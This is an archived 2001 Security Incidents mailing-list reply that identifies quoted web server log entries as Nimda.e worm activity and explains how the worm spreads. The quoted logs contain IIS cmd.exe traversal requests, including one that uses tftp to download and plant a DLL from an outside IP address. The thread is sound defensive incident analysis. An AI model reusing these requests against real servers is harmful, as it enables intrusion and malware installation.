Security Incidents mailing list archives

Re: New Worm Variant?

From: Ryan Russell <ryan () securityfocus com>
Date: Tue, 30 Oct 2001 10:08:42 -0700 (MST)

On Mon, 29 Oct 2001, Aj Effin Reznor wrote:

[29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:09:11 -0800] "GET

/c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll

HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330
"-" "-"


As someone pointed out, this is Nimda.e .  What's going on here is that
since your web server is responding with a 200 to the exploit attempt, it
thinks it has found a vulnerable victim.  So it issues the tftp command to
try and make your web server download a copy.  Then it sends a command to
try to execute the file it thinks it has caused you to download.

                                        Ryan


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

New Worm Variant? Aj Effin Reznor (Oct 30)
- Re: New Worm Variant? Ryan Russell (Oct 30)
- <Possible follow-ups>
- RE: New Worm Variant? Kester, Kelly (Oct 30)